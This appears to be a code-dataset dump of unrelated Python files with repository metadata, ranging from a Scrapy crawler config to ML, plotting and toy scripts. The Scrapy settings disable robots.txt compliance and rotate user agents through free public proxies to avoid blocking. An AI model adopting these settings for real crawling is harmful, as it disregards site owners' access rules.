# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
# "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
# "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
# ]
# USER_AGENT = random.choice(USER_AGENT_LIST)  # each run of the crawler picks a different user agent, but it stays the same for every request within that run
# User-defined IP proxy pool
# Free proxy IPs from Xici are a good choice! (oops) URL: https://www.xicidaili.com/wt
IPPOOL_LIST = [
{"ipaddr": "124.16.75.212:8080"},
{"ipaddr": "101.231.234.38:8080"},
{"ipaddr": "218.64.69.79:8080"},
{"ipaddr": "144.123.70.252:9999"},
{"ipaddr": "113.121.21.199:9999"},
{"ipaddr": "171.35.161.147:9999"},
{"ipaddr": "27.204.84.42:9999"},
]
# Whether to obey robots.txt rules: True to obey, False to ignore; some sites cannot be crawled when the rules are obeyed
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'testCrawler1_0.middlewares.Testcrawler10SpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
# 'testCrawler1_0.middlewares.Testcrawler10DownloaderMiddleware': 543,
    # Custom IP proxy pool middleware; its priority must be higher than the HttpProxyMiddleware
'testCrawler1_0.middlewares.IPPOOLS': 747,
'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 748,
    # Custom user-agent pool middleware; its priority must be higher than the UserAgentMiddleware
'testCrawler1_0.middlewares.USERAGENTS': 749,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': 750,
    # Replace this with your own project name; the overrides must have high priority (the number is the priority: the smaller the number, the higher the priority)
'scrapy_splash.SplashCookiesMiddleware': 744,
'scrapy_splash.SplashMiddleware': 745,
'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,
}
HTTPCACHE_ENABLED = True
HTTPCACHE_EXPIRATION_SECS = 0
HTTPCACHE_DIR = 'httpcache'
SPLASH_URL = "http://192.168.99.100:8050/"  # location of the Splash instance in your own Docker install
DUPEFILTER_CLASS = "scrapy_splash.SplashAwareDupeFilter"
HTTPCACHE_STORAGE = 'scrapy_splash.SplashAwareFSCacheStorage'
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'testCrawler1_0.pipelines.Testcrawler10Pipeline': 201,
'testCrawler1_0.pipelines.Testcrawler10ImagePipeline': 200,
}
IMAGES_STORE = 'D:/GitRepository/STAWZW2.0/WorkLean/Python/Scrapy/core-scrapy-master/img/'  # image storage path
IMAGES_URLS_FIELD = "image_urls"  # matches the field defined on the item; holds the image URLs
IMAGES_RESULT_FIELD = "image_path"
# 30 days of delay for images expiration
IMAGES_EXPIRES = 30
# # Image thumbnails
# IMAGES_THUMBS = {
# 'small': (50, 50),
# 'big': (270, 270),
# }
# # Image filter: minimum height and width
# IMAGES_MIN_HEIGHT = 110
# IMAGES_MIN_WIDTH = 110
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPERROR_ALLOWED_CODES --> HTTP error codes that requests are allowed to return: [code]
HTTPERROR_ALLOWED_CODES = [301]
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
# # Whether to enable logging
# LOG_ENABLED=True
# # Encoding used by the log
# LOG_ENCODING='utf-8'
# # Log file (file name)
# LOG_FILE='testScrapyLog.log'
# # Log format
# LOG_FORMAT='%(asctime)s [%(name)s] %(levelname)s: %(message)s'
# # Log date format
# LOG_DATEFORMAT='%Y-%m-%d %H:%M:%S'
# # Log level: CRITICAL, ERROR, WARNING, INFO, DEBUG
# LOG_LEVEL='DEBUG'
# # If True, all standard output (including errors) is redirected to the log, e.g. print('hello')
# LOG_STDOUT=True
# # If True, log entries show only the root name; if False, the emitting component is shown
# LOG_SHORT_NAMES=False
|
[
"1223868042@qq.com"
] |
1223868042@qq.com
|
b03811a2a5a5661848fbf370e6bba4eeb45fd36a
|
584e9c42e6240b9facc866703a6f26b06773df94
|
/TwilioSendGrid/stressful_subject.py
|
e3f8e396652697024e58f215a4cea54ffaf77bc9
|
[] |
no_license
|
anton-dovnar/checkio
|
48fbaf84c244b0fca7bed5cf7f34179cf850adf9
|
10aed757ec36f182871a03ed8c9e73319cc8824a
|
refs/heads/master
| 2023-03-24T16:23:39.524060
| 2021-03-12T13:07:04
| 2021-03-12T13:07:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
#!/home/fode4cun/.local/share/virtualenvs/checkio-ufRDicT7/bin/checkio --domain=py run stressful-subject
#
# END_DESC
import re
def is_stressful(subj):
"""
recognize stressful subject
"""
if subj.isupper() or subj.endswith('!!!'):
return True
patterns = [r'(\b[help\!\-\.]{4,}\b)', r'(\b[asap\!\-\.]{4,}\b)', r'(\b[urgent\!\-\.]{4,}\b)']
for pattern in patterns:
if re.search(pattern, subj, flags=re.IGNORECASE):
return True
return False
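# Added note: the character-class patterns above match stretched or dotted
# spellings such as "HHHEEELLLPPP", "a-s-a-p" or "u.r.g.e.n.t" -- any run of
# four or more characters drawn from the keyword plus '!', '-' and '.',
# matched case-insensitively between word boundaries.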
if __name__ == '__main__':
#These "asserts" are only for self-checking and not necessarily for auto-testing
assert is_stressful("Hi") == False, "First"
assert is_stressful("I neeed HELP") == True, "Second"
print('Done! Go Check it!')
|
[
"fode4cun@gmail.com"
] |
fode4cun@gmail.com
|
c6756abdb37e1f8b52dd5b35b3118afb8bc40f58
|
ab825ee0326e98d115b6dc02bbda02b302787d46
|
/応用編/41_csvファイルの読み書き/モジュール/01_CSVファイルの書き込み.py
|
bb00d85a58a09d9f502ac4e2f14bf4e26a8d34d9
|
[] |
no_license
|
holothuria/python_study
|
295dd7c30a566b5a9688b9196e25bf6e065401a0
|
7e98090e64d646d23a4189e0efd68c2905b78d04
|
refs/heads/master
| 2020-03-23T20:04:38.900368
| 2019-03-05T12:47:53
| 2019-03-05T12:47:53
| 142,019,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
import csv
csv_file = open('./python.csv', 'w', newline='')
writer = csv.writer(csv_file)
row = ('python', '-', 'izm', '1')
writer.writerow(row)
rows = []
rows.append(('python', '-', 'izm', '2'))
rows.append(('python', '-', 'izm', '3'))
rows.append(('p,y,t,h,o,n', '-', 'i,z,m', '4'))
writer.writerows(rows)
csv_file.close()
|
[
"umehara.daichi@withone.co.jp"
] |
umehara.daichi@withone.co.jp
|
992f5347a46a745fa991942a9bdb04ea5c918b52
|
b3d86713ed58e0b7fe3c1191324e36659c0d9d78
|
/DataScience/ch10/evaluation_data.py
|
94d29f7149b5f9ebae13989f4ba23eb44c469612
|
[] |
no_license
|
Kose-i/machine_learning_tutorial
|
3d6cb30a20d65c66aa6efcba0e693de75791507a
|
def223fecb459ad1a6e7f9f36b3d733a89efd378
|
refs/heads/master
| 2021-07-03T10:37:26.809388
| 2020-07-27T12:53:19
| 2020-07-27T12:53:19
| 174,057,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,989
|
py
|
import numpy as np
import numpy.random as random
import scipy as sp
from pandas import Series, DataFrame
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib as mpl
import seaborn as sns
sns.set()
import sklearn
from sklearn.datasets import load_breast_cancer
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.metrics import confusion_matrix
cancer = load_breast_cancer()
x_train, x_test, y_train, y_test = train_test_split(cancer.data, cancer.target, test_size=0.5, random_state=66)
tree = DecisionTreeClassifier(criterion='entropy', max_depth=3, random_state=0)
scores = cross_val_score(tree, cancer.data, cancer.target, cv=5)
print('Cross validation scores: {}'.format(scores))
print('Cross validation scores: {:.3f}+-{:.3f}'.format(scores.mean(), scores.std()))
# AUC ROC
from sklearn.linear_model import LogisticRegression
model = LogisticRegression(random_state=0)
model.fit(x_train, y_train)
results = pd.DataFrame(model.predict_proba(x_test), columns=cancer.target_names)
results.head()
rates = {}
for threshold in np.linspace(0.01, 0.99, num=50):
labels = results['benign'].map(lambda x: 1 if x>threshold else 0)
m = confusion_matrix(y_test, labels)
rates[threshold] = {'false positive rate':m[0,1]/m[0,:].sum(), 'true positive rate':m[1,1]/m[1,:].sum()}
pd.DataFrame(rates).T.plot.scatter('false positive rate','true positive rate')
from sklearn import svm
from sklearn.metrics import roc_curve, auc
model = svm.SVC(kernel='linear', probability=True, random_state=0)
model.fit(x_train, y_train)
y_pred = model.predict_proba(x_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred)
roc_auc = auc(fpr, tpr)
plt.plot(fpr, tpr, color='red', label='ROC curve (area=%.3f)'%roc_auc)
plt.plot([0,1],[0,1],color='black', linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('Receiver operating characteristic')
plt.legend(loc="best")
plt.show()
|
[
"tamura.kosei905@mail.kyutech.jp"
] |
tamura.kosei905@mail.kyutech.jp
|
e86714e61dde836eeef750f7a800b133850db443
|
acad69f0abe162eea0cb13cbe15bfd88f6da08b4
|
/down-stream-tasks/mmdetection/mmdet/models/losses/ghm_loss.py
|
bc5eb774eab3c7515868c266182760c92061c911
|
[
"Apache-2.0"
] |
permissive
|
zhangzjn/EMO
|
69afcac53800d8b9a390f1214e178e2ca4da3b24
|
141afbdbce04683790f0699f256327ec420be442
|
refs/heads/main
| 2023-08-27T19:04:23.313676
| 2023-08-15T04:09:55
| 2023-08-15T04:09:55
| 584,987,542
| 139
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,136
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
from .utils import weight_reduce_loss
def _expand_onehot_labels(labels, label_weights, label_channels):
bin_labels = labels.new_full((labels.size(0), label_channels), 0)
inds = torch.nonzero(
(labels >= 0) & (labels < label_channels), as_tuple=False).squeeze()
if inds.numel() > 0:
bin_labels[inds, labels[inds]] = 1
bin_label_weights = label_weights.view(-1, 1).expand(
label_weights.size(0), label_channels)
return bin_labels, bin_label_weights
# TODO: code refactoring to make it consistent with other losses
@LOSSES.register_module()
class GHMC(nn.Module):
"""GHM Classification Loss.
Details of the theorem can be viewed in the paper
`Gradient Harmonized Single-stage Detector
<https://arxiv.org/abs/1811.05181>`_.
Args:
bins (int): Number of the unit regions for distribution calculation.
momentum (float): The parameter for moving average.
use_sigmoid (bool): Can only be true for BCE based loss now.
loss_weight (float): The weight of the total GHM-C loss.
reduction (str): Options are "none", "mean" and "sum".
Defaults to "mean"
"""
def __init__(self,
bins=10,
momentum=0,
use_sigmoid=True,
loss_weight=1.0,
reduction='mean'):
super(GHMC, self).__init__()
self.bins = bins
self.momentum = momentum
edges = torch.arange(bins + 1).float() / bins
self.register_buffer('edges', edges)
self.edges[-1] += 1e-6
if momentum > 0:
acc_sum = torch.zeros(bins)
self.register_buffer('acc_sum', acc_sum)
self.use_sigmoid = use_sigmoid
if not self.use_sigmoid:
raise NotImplementedError
self.loss_weight = loss_weight
self.reduction = reduction
def forward(self,
pred,
target,
label_weight,
reduction_override=None,
**kwargs):
"""Calculate the GHM-C loss.
Args:
pred (float tensor of size [batch_num, class_num]):
The direct prediction of classification fc layer.
target (float tensor of size [batch_num, class_num]):
Binary class target for each sample.
label_weight (float tensor of size [batch_num, class_num]):
the value is 1 if the sample is valid and 0 if ignored.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Defaults to None.
Returns:
The gradient harmonized loss.
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
# the target should be binary class label
if pred.dim() != target.dim():
target, label_weight = _expand_onehot_labels(
target, label_weight, pred.size(-1))
target, label_weight = target.float(), label_weight.float()
edges = self.edges
mmt = self.momentum
weights = torch.zeros_like(pred)
# gradient length
g = torch.abs(pred.sigmoid().detach() - target)
valid = label_weight > 0
tot = max(valid.float().sum().item(), 1.0)
n = 0 # n valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
n += 1
if n > 0:
weights = weights / n
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none')
loss = weight_reduce_loss(
loss, weights, reduction=reduction, avg_factor=tot)
return loss * self.loss_weight
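# Illustrative use of GHMC above (shapes are assumptions, names hypothetical):
#   criterion = GHMC(bins=10, momentum=0.75)
#   # pred: [batch, num_classes] logits; target: class indices or a binary
#   # matrix; label_weight: 1 for valid samples, 0 for ignored ones
#   loss = criterion(pred, target, label_weight)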
# TODO: code refactoring to make it consistent with other losses
@LOSSES.register_module()
class GHMR(nn.Module):
"""GHM Regression Loss.
Details of the theorem can be viewed in the paper
`Gradient Harmonized Single-stage Detector
<https://arxiv.org/abs/1811.05181>`_.
Args:
mu (float): The parameter for the Authentic Smooth L1 loss.
bins (int): Number of the unit regions for distribution calculation.
momentum (float): The parameter for moving average.
loss_weight (float): The weight of the total GHM-R loss.
reduction (str): Options are "none", "mean" and "sum".
Defaults to "mean"
"""
def __init__(self,
mu=0.02,
bins=10,
momentum=0,
loss_weight=1.0,
reduction='mean'):
super(GHMR, self).__init__()
self.mu = mu
self.bins = bins
edges = torch.arange(bins + 1).float() / bins
self.register_buffer('edges', edges)
self.edges[-1] = 1e3
self.momentum = momentum
if momentum > 0:
acc_sum = torch.zeros(bins)
self.register_buffer('acc_sum', acc_sum)
self.loss_weight = loss_weight
self.reduction = reduction
# TODO: support reduction parameter
def forward(self,
pred,
target,
label_weight,
avg_factor=None,
reduction_override=None):
"""Calculate the GHM-R loss.
Args:
pred (float tensor of size [batch_num, 4 (* class_num)]):
The prediction of box regression layer. Channel number can be 4
or 4 * class_num depending on whether it is class-agnostic.
target (float tensor of size [batch_num, 4 (* class_num)]):
The target regression values with the same size of pred.
label_weight (float tensor of size [batch_num, 4 (* class_num)]):
The weight of each sample, 0 if ignored.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Defaults to None.
Returns:
The gradient harmonized loss.
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
mu = self.mu
edges = self.edges
mmt = self.momentum
# ASL1 loss
diff = pred - target
loss = torch.sqrt(diff * diff + mu * mu) - mu
# gradient length
g = torch.abs(diff / torch.sqrt(mu * mu + diff * diff)).detach()
weights = torch.zeros_like(g)
valid = label_weight > 0
tot = max(label_weight.float().sum().item(), 1.0)
n = 0 # n: valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
n += 1
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
if n > 0:
weights /= n
loss = weight_reduce_loss(
loss, weights, reduction=reduction, avg_factor=tot)
return loss * self.loss_weight
|
[
"186368@zju.edu.cn"
] |
186368@zju.edu.cn
|
e7a6d17a22f5e9f8531f0d8e0c576cff70c8e1eb
|
3474fd7e1ccd8dd4e0b4da5c67d89694c69ce73c
|
/batch3/outputs/bbn_yhe.py
|
2d75b05e4272c8e13788d9378f35e7fd0e971249
|
[] |
no_license
|
mishakb/ISiTGR
|
149e1235ed2fff6ee2452b53c23dbe46f5dcf17e
|
db4f6fed47162de6347b62b3f8ae832e4ffbfdf0
|
refs/heads/master
| 2023-01-16T02:42:31.787483
| 2021-03-12T04:39:18
| 2021-03-12T04:39:18
| 176,977,260
| 27
| 7
| null | 2023-01-02T15:19:33
| 2019-03-21T15:48:31
|
HTML
|
UTF-8
|
Python
| false
| false
| 4,578
|
py
|
import planckStyle as s
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.insert(0, r'c:\work\dist\git\camb')
from camb.bbn import BBN_table_interpolator
BBNstandard = BBN_table_interpolator('PArthENoPE_880.2_standard.dat')
# BBN theoretical error
sigma_yp_theo = 0.0003
# resolution of the theoretical BBN curve (number of omega_b values)
num_ob = 50
# omegab range in the plot
ob_min = 0.019
ob_max = 0.025
# yhe range in the plot
yp_min = 0.175
yp_max = 0.28
# helium data: Aver et al. 2015
aver_mean = 0.2449
aver_sigma = 0.004
# helium data: Serenelli and Basu 2010
sere_minus = 0.294
sere_plus = yp_max
sere_b = np.zeros(2, dtype='float')
sere_y1 = np.zeros(2, dtype='float')
sere_y2 = np.zeros(2, dtype='float')
sere_b[0] = ob_min
sere_b[1] = ob_max
sere_y1[0] = sere_minus
sere_y1[1] = sere_minus
sere_y2[0] = sere_plus
sere_y2[1] = sere_plus
labels = [s.planckall, s.planckall + "+lensing+BAO"]
datatag = [s.defdata_all, s.defdata_all + '_lensing_BAO']
########### ombh2 -Yhe #############
g = s.getSinglePlotter()
colors = g.settings.solid_colors[3:0:-1]
del colors[1]
bbn_b = np.arange(ob_min, ob_max + 0.1, (ob_max - ob_min) / num_ob)
bbn_y = np.array([BBNstandard.Y_p(x, 0) for x in bbn_b])
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
g.add_y_bands(aver_mean, aver_sigma)
# plt.fill_between(sere_b, sere_y1, yp_max, alpha=0.07, color='gray')
# plt.plot(sere_b, sere_y1, alpha=0.2, color='gray', linestyle='-')
plt.text(0.0193, 0.249, "Aver et al. (2015)", fontsize=7.)
# plt.text(0.0183, 0.325, "Excluded by Serenelli \& Basu (2010)", fontsize=6.5)
bbn_y1 = bbn_y - 2 * sigma_yp_theo
bbn_y2 = bbn_y + 2 * sigma_yp_theo
plt.fill_between(bbn_b, bbn_y1, bbn_y2, alpha=0.4, color='green', lw=0, zorder=10)
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
plt.fill_between(bbn_b, bbn_y1, bbn_y2, alpha=0.9, color='green', lw=0, zorder=11)
# plt.plot(bbn_b, bbn_y1, color='green', linestyle='solid')
# plt.plot(bbn_b, bbn_y2, color='green', linestyle='solid')
roots = [g.getRoot('yhe', d) for d in datatag]
g.settings.legend_fontsize = 8
g.plot_2d(roots, 'omegabh2', 'YpBBN', filled=True, lims=[ob_min + 0.0001, ob_max, yp_min, yp_max])
g.add_legend(labels, legend_loc='lower left', colored_text=False)
# plt.gca().set_yticks([0.2, 0.25, 0.3])
plt.gca().annotate('Standard BBN',
xy=(0.0242, 0.249),
xycoords='data',
xytext=(-35, -30),
textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3,rad=.2"),
fontsize=8.
)
g.export()
########### Neff -Yhe #############
g = s.getSinglePlotter()
N_min = 0.01
N_max = 5
Neff = np.arange(N_min, N_max + 0.1, 0.1)
Nrange = [N_min, N_max]
g.add_y_bands(aver_mean, aver_sigma)
plt.fill_between(Nrange, Neff[-1], sere_y1, alpha=0.07, color='gray')
plt.plot(Nrange, sere_y1, alpha=0.2, color='gray', linestyle='-')
plt.text(0.17, 0.242, "Aver et al. (2015)", fontsize=6)
plt.text(0.17, 0.337, "Excluded by Serenelli \& Basu (2010)", fontsize=6)
roots = [g.getRoot('nnu_yhe', d) for d in datatag]
# roots += ['base_nnu_yhe_' + s.defdata_all + '_Aver15']
g.plot_2d(roots, 'nnu', 'YpBBN', filled=True, lims=[0, N_max, yp_min, yp_max])
g.add_2d_contours('base_nnu_yhe_' + s.defdata_all + '_Aver15_post_BAO_lensing', 'nnu', 'YpBBN', filled=False)
ombh2mean = 0.0224
bbn_y = np.array([BBNstandard.Y_p(ombh2mean, x - 3.046) for x in Neff])
bbn_y1 = bbn_y - 2 * sigma_yp_theo
bbn_y2 = bbn_y + 2 * sigma_yp_theo
plt.fill_between(Neff, bbn_y1, bbn_y2, alpha=0.4, color='green', lw=0)
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
plt.fill_between(Neff, bbn_y1, bbn_y2, alpha=0.9, color='green', lw=0)
# plt.plot(Neff, bbn_y1, color='green', linestyle='solid')
# plt.plot(Neff, bbn_y2, color='green', linestyle='solid')
labels = labels[:1] + ['+lensing+BAO']
g.add_legend(labels, legend_loc='lower left', colored_text=True, fontsize=8)
g.add_x_marker(3.046)
plt.gca().set_yticks([0.15, 0.2, 0.25, 0.3, 0.35])
# g.rotate_yticklabels()
plt.gca().annotate('Standard BBN\n' + r'($\Omega_{\rm b} h^2=0.0224$)',
xy=(4.5, 0.262),
xycoords='data',
xytext=(-44, 30),
textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3,rad=.2"),
fontsize=6.5
)
g.export(tag='neff')
|
[
"gqcristhian@utdallas.edu"
] |
gqcristhian@utdallas.edu
|
f7246f5b593196ab8c42ab3791fb27a636fa9877
|
2836c3caf8ca332635640a27254a345afd449081
|
/nws/FFE/dump_text.py
|
64ee6d4d5a352d51b778840d80848c276b2e4fec
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
akrherz/DEV
|
27cf1bac978a0d6bbfba1851b90d2495a3bdcd66
|
3b1ef5841b25365d9b256467e774f35c28866961
|
refs/heads/main
| 2023-08-30T10:02:52.750739
| 2023-08-29T03:08:01
| 2023-08-29T03:08:01
| 65,409,757
| 2
| 0
|
MIT
| 2023-09-12T03:06:07
| 2016-08-10T19:16:28
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,179
|
py
|
"""Dump text from database."""
from pyiem.util import get_dbconn
def main():
"""Go Main Go."""
pgconn = get_dbconn("postgis")
cursor = pgconn.cursor()
cursor.execute(
"WITH data as ("
"SELECT wfo, eventid, issue at time zone 'UTC' as issue, report, "
"expire at time zone 'UTC' as expire, "
"svs, row_number() OVER (PARTITION by wfo, eventid, "
"extract(year from issue) ORDER by length(svs) DESC) from "
"warnings where phenomena = 'FF' and significance = 'W' and "
"is_emergency) "
"SELECT * from data WHERE row_number = 1 ORDER by issue, wfo, eventid"
)
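    # Added note: the window query keeps, per (wfo, eventid, year), only the
    # row whose svs text is longest, i.e. the most complete update chain.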
done = []
for row in cursor:
key = f"{row[0]}_{row[1]}_{row[2].year}"
if key in done:
continue
done.append(key)
i = 0
with open(f"FFE_Text/{key}_{i}.txt", "w") as fh:
fh.write(row[3])
for prod in ("" if row[5] is None else row[5]).split("__"):
if prod.strip() == "":
continue
i += 1
with open(f"FFE_Text/{key}_{i}.txt", "w") as fh:
fh.write(prod)
if __name__ == "__main__":
main()
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
cf173c4188039fb9f7c03d8041bab18213f9fedf
|
2dd0082221239fef0e0894c852f70f1eaeb62b9e
|
/Assignments/pete/python/lab12/lab12-guess_the_number-v5.py
|
2c9c150c8bd62d806effabdefe672c22f7b08fbf
|
[] |
no_license
|
pjz987/2019-10-28-fullstack-night
|
03097cf3dc24aeec0c326044bb0fc99385fbc333
|
4c643013de73f08d7503d62ec602d6a5c80ffa7e
|
refs/heads/master
| 2022-11-11T19:40:00.296645
| 2020-06-25T16:14:47
| 2020-06-25T16:14:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
'''
lab12-guess_the_number-v5.py
V5
Swap the user with the computer: the user will pick a number, and the computer will make random guesses until they get it right.
'''
import random
import time
user_num = int(input("Welcome to Guess the Number v5.\nIn this program, computer guess you!\nPlease enter a number between 1 and 10: "))
while True:
if user_num not in list(range(1, 11)):
user_num = int(input(f"No cheating computer now. {user_num} is not a number between 1 and 10. Please enter a new number: "))
else:
break
guesses = []
count = 0
while True:
time.sleep(1)
guess = random.randint(1, 10)
if guess == user_num:
print(f"Computer guessed your number {user_num}.\n")
time.sleep(1)
while True:
print("CONGRATULATION: COMPUTER GUESS YOU!" * count)
count = count + 1
time.sleep(.25)
else:
if guess in guesses:
print(f"Computer guess {guess} again. Computer can never be too sure.")
else:
print(f"Computer guessed {guess}. Computer wrong. Computer try again.")
guesses.append(guess)
|
[
"pwj2012@gmail.com"
] |
pwj2012@gmail.com
|
ecad71b97f40fd1c4027e616ed6efc3e283cbe34
|
2442d073434d463cede4a79ae8f9fd31c62174f8
|
/object-oriented-programming/composition/address.py
|
fec0ad8bea031d381431f42455a4d6f1d84773c9
|
[] |
no_license
|
grbalmeida/hello-python
|
3630d75cfdde15223dc1c3a714fd562f6cda0505
|
4d9ddf2f7d104fdbc3aed2c88e50af19a39c1b63
|
refs/heads/master
| 2020-07-10T10:04:38.982256
| 2020-02-26T00:37:36
| 2020-02-26T00:37:36
| 204,237,527
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
class Address:
def __init__(self, city, state):
self.city = city
self.state = state
def __del__(self):
        print(f'{self.city}/{self.state} has been deleted')
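# Added note: __del__ runs when the object is garbage-collected -- in
# CPython usually when its reference count hits zero -- but the timing is
# not guaranteed, so critical cleanup should not rely on it.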
|
[
"g.r.almeida@live.com"
] |
g.r.almeida@live.com
|
3fc82b879ed14d4f2cb2742b09238700a3f0c64f
|
54e23ae20b7351f1e5db325b13cc9a106b3e581a
|
/transformer/layers.py
|
723c431493e82ba286dc994ed9bec9d9c528fbf9
|
[
"Apache-2.0"
] |
permissive
|
okehkim/End-to-End-Speech-Recognition-Models
|
191755c7fdab23ad61280279e200c9757824c64b
|
7b4695bbc778e4d2c92470b56e2479c8d81d0079
|
refs/heads/main
| 2023-01-30T02:11:57.860303
| 2020-11-28T16:53:02
| 2020-11-28T16:53:02
| 316,779,547
| 0
| 0
|
Apache-2.0
| 2020-11-28T16:52:27
| 2020-11-28T16:52:27
| null |
UTF-8
|
Python
| false
| false
| 4,293
|
py
|
# -*- coding: utf-8 -*-
# Soohwan Kim @ https://github.com/sooftware/
# This source code is licensed under the Apache 2.0 License license found in the
# LICENSE file in the root directory of this source tree.
import torch.nn as nn
from torch import Tensor
from typing import Tuple, Optional, Any
from transformer.sublayers import AddNorm, PositionWiseFeedForwardNet
from attention import MultiHeadAttention
class SpeechTransformerEncoderLayer(nn.Module):
"""
EncoderLayer is made up of self-attention and feedforward network.
This standard encoder layer is based on the paper "Attention Is All You Need".
Args:
d_model: dimension of model (default: 512)
num_heads: number of attention heads (default: 8)
d_ff: dimension of feed forward network (default: 2048)
dropout_p: probability of dropout (default: 0.3)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
"""
def __init__(
self,
d_model: int = 512, # dimension of model
num_heads: int = 8, # number of attention heads
d_ff: int = 2048, # dimension of feed forward network
dropout_p: float = 0.3, # probability of dropout
ffnet_style: str = 'ff' # style of feed forward network
) -> None:
super(SpeechTransformerEncoderLayer, self).__init__()
self.self_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.feed_forward = AddNorm(PositionWiseFeedForwardNet(d_model, d_ff, dropout_p, ffnet_style), d_model)
def forward(
self,
inputs: Tensor, # B x T_input x D
non_pad_mask: Optional[Any] = None, # B x T_input
self_attn_mask: Optional[Any] = None # B x T_input x T_output
) -> Tuple[Tensor, Tensor]:
output, attn = self.self_attention(inputs, inputs, inputs, self_attn_mask)
output *= non_pad_mask
output = self.feed_forward(output)
output *= non_pad_mask
return output, attn
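# Illustrative use of the encoder layer above (mask construction and shapes
# are assumptions, not part of this file):
#   layer = SpeechTransformerEncoderLayer(d_model=512, num_heads=8)
#   output, attn = layer(inputs, non_pad_mask, self_attn_mask)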
class SpeechTransformerDecoderLayer(nn.Module):
"""
